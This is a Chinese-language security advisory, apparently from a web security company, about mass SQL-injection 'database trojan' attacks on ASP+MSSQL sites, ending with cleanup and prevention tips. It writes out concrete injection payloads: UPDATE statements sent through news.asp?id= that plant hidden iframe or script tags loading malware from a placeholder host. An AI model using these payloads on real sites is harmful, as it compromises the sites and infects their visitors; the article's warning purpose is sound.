有数据显示,自3月份以来有近2万的网站数据库被黑客植入恶意代码,经分析其中一个代码包居然能在短时间内下载达五种木马程序。数据库,网站运营的基础,网站生存的要素,不管是个人用户还是企业用户都非常依赖网站数据库的支持,然而很多别有用心的攻击者也同样非常“看重”网站数据库。
对于个人网站来说,受到建站条件的制约,Access数据库成了广大个人网站站长的首选。但是对于企业网站来说,则大多使用mssql数据库。新闻、论坛各种web应用程序需要数据库来支撑。
近来很多站长向我们反映,他们站出了问题了。仔细一分析,发现原来是数据库常被人挂马了。其实这个挂马方法在已经在小范围内流行了很久,网易科技报道的今年3月14日,安全厂商趋势科技部分网页遭到攻击被挂上恶意代码,攻击者使用的便是这种攻击手法。现在很有可能大规模爆发,现撰文提醒广大用户注意。
一、挂马原因分析
通过分析挂马代码,我们进行了广泛的研究,发现被黑的页面都有如下特征:
1.被修改页面的网站都是ASP+MSSQL的架构。
2.被修改的页面都存在SQL注入漏洞。
这次大规模攻击的流程应该是自动化的:
1.通过先进的扫描技术批量收集到几万网站的SQL注入漏洞。
2.针对漏洞攻击,进行自动化的SQL注入挂马。
现今虽然SQL注入漏洞已经很老了,但是黑客在一天内同时对数万网站攻击挂马的技术却是很惊人的,连趋势这样的安全公司也未能幸免。
数据库木马是怎么插入的呢?什么样的站会遭受此类攻击呢?我们认为主要有两种类型的网站:
1、存在注入漏洞的网站
一般是由于存在注入漏洞,可以对表里的字段进行修改。
举个例子,比如首页有一条新闻为:“北京奥运会到了”,那么鼠标点此新闻,地址栏打开的新窗口为news.asp?id=XX,这种情况,这时,就可以判断此新闻是从数据库中调用的了。数据库被挂马后的情况是怎么样呢? 假如被挂马前,首页显示的一条新闻标题为“北京奥运会到了”,那么挂马后,首页显示的标题是“北京奥运会到了</a>< iframe src=http://www.xxxx.com/muma.html width=0 height=0></iframe>”,那这样的话,首页就会执行这段代码了,挂马攻击就成功了。
如何实现修改标题或其他字段呢? 比如修改 新闻来源呢?因为”来源”字段比较隐蔽。一般人看新闻,都不怎么看来源。
首先,攻击者要有目标网站中的一个注入点,比如就点在news.asp?id=1,这时如果要挂马可以不用拿到 webshell,因为如果攻击者的目的只在于挂马的话,那挂马最直接的方式就是更改数据库内容。
要实施这种攻击,首先找到了注入点,只要有一个注入点 就可以进行全数据库挂马。当然前提是需要把所有的表、段猜出来。所以其次就得找表名,比如假设新闻的表名为news,字段为ID ,title, content,laiyuan,等等。
假如攻击者知道,首页来源是 调用的数据库的字段就为news表中的laiyuan,这时在注入点,可以提交 news.asp?id=xxx;update news set laiyuan='北京奥运会到了</a><iframe src=http://www.xxxx.com/muma.html width=0 height=0></iframe>' where id=1;
这样就可以更改数据库了,但前提是最少要少Db_Owner权限。一般的情况下,由于各表段一般限制了宽度,也就是说如果攻击者的代码的长度超过了指定的长度,那么攻击者的代码只能写一半,就填写不进去了,这样就不能执行了,所以挂马最好的方法是用<script>这种方法来挂马了,如:
news.asp?id=xxx;update news set laiyuan='北京奥运会到了</a><script src=http://www.xxxx.com/muma.html></script>' where id=1;长度有很大的减少,目前主要都是这种方式。
2、存在各种漏洞,容易进入后台的网站
后台挂马,一般是第一种情况不能得手,就只能靠进后台挂马。这时要仔细观察后台,比如网站的链接、顶部底部的广告、都可以直接写入你的木马代码等等。由于web程序成千上万,web程序后台同样是多种多样的,具体问题具体分析。一个最简单的方法,就是通过添加用户的方法实现。
二、正确清理木马
有不少站长说“我论坛被挂马了,我刚删了那些马,论坛怎么就显示数据库出错呢?”
数据库不能随便修改或删除,被挂上马后,更需要谨慎的操作。建议,先备份然后再小心清理。
三、终极解决方法
中国互联安全网有关专家指出“数据库挂马在未来一段时间,必然成为黑客攻击的主要手段之一,广大用户需要警惕。至于如何防范数据库挂马,我们初步认为这个主要是四点:
1、清理网站上所有注入点。
2、为网站配置可靠的防注入程序。
3、最好在网站源码中做好过滤,在数据库中限制字符的类型和长度。
4、养成经常备份数据库的习惯。大家可能无法保证天天备份数据库,但也会保证每周备份一次,如果有时间保证天天备份数据库。
5、最好是请专业的网站安全公司,对您的站和服务器做彻底的安全评估。
如果遇到此类问题可以咨询我们:
电话:020-32068532 32068416 32068703 32051815 32051816
